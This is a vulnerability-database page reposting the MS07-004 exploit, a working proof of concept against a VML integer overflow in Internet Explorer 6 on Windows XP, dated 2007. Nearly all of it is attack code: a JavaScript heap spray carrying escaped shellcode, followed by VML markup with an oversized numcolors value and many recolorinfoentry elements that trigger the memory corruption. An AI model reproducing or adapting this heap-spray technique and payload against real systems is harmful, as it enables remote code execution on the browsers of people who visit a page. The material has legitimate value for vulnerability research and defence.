Lucene search
ms07-004.txt

🗓️ 20 Jan 2007 00:00:00Reported by lifeasageekType
packetstorm🔗 packetstormsecurity.com👁 22 Views
MS07-004 VML integer overflow exploit by lifeasageek. Tested on WinXP SP2 Korean version & IE 6.0, Sorry about exploit hit ratio is only about 1/5, All the java script codes scratched from MS06-055 exploit written by Trirat Puttaraksa
AI Insights are available for you today
Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability
`  
<!--  
  
MS07-004 VML integer overflow exploit   
by lifeasageek at gmail.com  
  
- Trigger CVMLRecolorinfo::InternalLoad() method  
you can see the screen captured image "http://picasaweb.google.com/lifeasageek/MS07004/photo?pli=1#5019163989136880322"  
which is generated by DarunGrim  
  
- tested on WinXP SP2 Korean version( fully patched except kb929969) & IE 6.0  
and I hope it works well in English version  
  
- sorry about that exploit hit ratio is only about 1/5  
If you have any good idea to improve reliability, please send me an  
e-mail with your idea  
  
- all the java script codes scratched from MS06-055 exploit written  
byTrirat Puttaraksa (Kira) <trir00t [at] gmail.com>  
and slightly modified  
  
- 2007.1.15  
  
-->  
  
<html xmlns:v="urn:schemas-microsoft-com:vml">  
  
<head>  
<object id="VMLRender"  
classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">  
</object>  
<style>  
v\:* { behavior: url(#VMLRender); }  
</style>  
</head>  
  
<body>  
  
<SCRIPT language="javascript">  
shellcode =  
unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");  
  
bigblock = unescape("%u0505%u0505");  
headersize = 20;  
slackspace = headersize+shellcode.length;  
while (bigblock.length<slackspace) bigblock+=bigblock;  
fillblock = bigblock.substring(0, slackspace);  
block = bigblock.substring(0, bigblock.length-slackspace);  
while(block.length+slackspace<0x40000) block = block+block+fillblock;  
memory = new Array();  
for (i=0;i<350;i++) memory[i] = block + shellcode;  
  
</script>  
  
<v:rect style='width:120pt;height:80pt' fillcolor="red" >  
<v:recolorinfo recolorstate="t" numcolors="97612895">  
  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"  
lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"  
fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>  
<v/recolorinfo>  
</html>   
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo
20 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4